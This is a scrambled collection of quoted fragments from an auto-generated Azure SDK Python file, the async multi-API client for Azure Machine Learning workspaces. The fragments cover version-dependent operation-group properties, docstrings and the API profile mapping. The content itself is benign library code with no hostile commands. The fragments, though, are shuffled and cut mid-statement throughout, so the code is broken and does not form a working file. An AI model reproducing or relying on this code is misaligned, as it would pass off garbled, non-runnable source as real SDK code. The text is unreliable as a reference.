:class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version", "from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "@property def runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\"", ":class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from", "contains multiple API versions, to help you deal with all of the Azure", ":class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations", "api-version and/or profile. 
The profile sets a mapping between an operation group and", "== '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {}", "'1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0',", "\"\"\"This is a fake class to support current implemetation of MultiApiClientMixin.\" Will be", "raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config,", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return", "str :param base_url: Service URL :type base_url: str :param profile: A profile definition,", "self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self, *exc_details): await", "'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans':", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version ==", "2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if", "base_url: str :param profile: A profile definition, from KnownProfiles to dict. 
:type profile:", "subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod", ":class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version", "import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0:", "{} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", ":class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version ==", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'batch_endpoints'\".format(api_version)) return", "on the API version: * 2021-10-01: 
:class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>`", "the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` *", "@property def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` *", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets')", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version))", "@property def private_endpoint_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` *", "..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations", "from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not", "..runhistory.aio.operations import RunOperations as 
OperationClass else: raise ValueError(\"API version {} does not have", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return", "ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "URL :type base_url: str :param profile: A profile definition, from KnownProfiles to dict.", "is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG:", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API", "default API version if the operation group is not described in the profile.", "== '2022-05-01': from ..v2022_05_01 import models return models raise ValueError(\"API version {} is", "version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from", "api_version == 'v1.0': from ..runhistory import models return models elif api_version == '2020-09-01-dataplanepreview':", "in profile. 
:type api_version: str :param base_url: Service URL :type base_url: str :param", "v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on", "not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self):", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0:", "on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>`", "import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as", "and will be lost if the code is # regenerated. 
# -------------------------------------------------------------------------- from", "2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API", "'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \"", "2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if", "Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>`", "'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the", "OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API version:", "* v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>` * 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` *", "to help you deal with all of the Azure clouds (Azure Stack, Azure", "does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass", "Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>`", "{} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version:", "..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations", "* 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from 
..v2021_10_01.aio.operations", "DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers')", "operate on Azure Machine Learning Workspace resources. This ready contains multiple API versions,", "on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version", "v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import", "the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions')", "raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config,", "== '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {}", "Microsoft (R) AutoRest Code Generator. 
# Changes may cause incorrect behavior and will", "'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance depends on the", "on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>`", "..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version))", "VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "have operation group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models')", "depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: 
:class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview:", "DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION,", "import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise", "raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: *", "2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "to connect to Azure. 
:type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the", "the default API version if the operation group is not described in the", "raise ValueError(\"API version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config,", "def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview:", "\"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None:", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01:", "def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version", "def run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version", "import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 
'online_endpoints'\".format(api_version))", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from", "2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01':", "= self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif", "import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` *", "all of the Azure clouds (Azure Stack, Azure Government, Azure China, etc.). 
By", "Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>`", "version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "* 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version =", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API version:", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version))", "== '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from", "group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance depends on", "api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version", "elif api_version == '2021-10-01-dataplanepreview': from 
..v2021_10_01_dataplanepreview import models return models elif api_version ==", "* 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version ==", "..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations", "== '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version {}", "'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the", "= \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0',", "= self._get_api_version('model_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif", "dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version =", "group is not described in the profile. 
:param credential: Credential needed for the", ":mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version", "import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview':", "import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as", "group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on", "def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview:", "have operation group 'events'\".format(api_version)) return 
OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance", "'2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview:", "does not have operation group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>`", "API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: 
:class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version: *", "\"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as", "'2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version: *", "no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return", "Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>`", "version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from", ":class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: 
:class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API", "on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>`", "from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "MigrationOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` *", "None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any", "else: raise ValueError(\"API version {} does not have operation group 'model_versions'\".format(api_version)) return 
OperationClass(self._client,", "..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version:", "@property def metric(self): \"\"\"Instance depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\"", ":mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01: :mod:`v2021_10_01.models<azure.mgmt.machinelearningservices.v2021_10_01.models>`", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from", "* 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations", 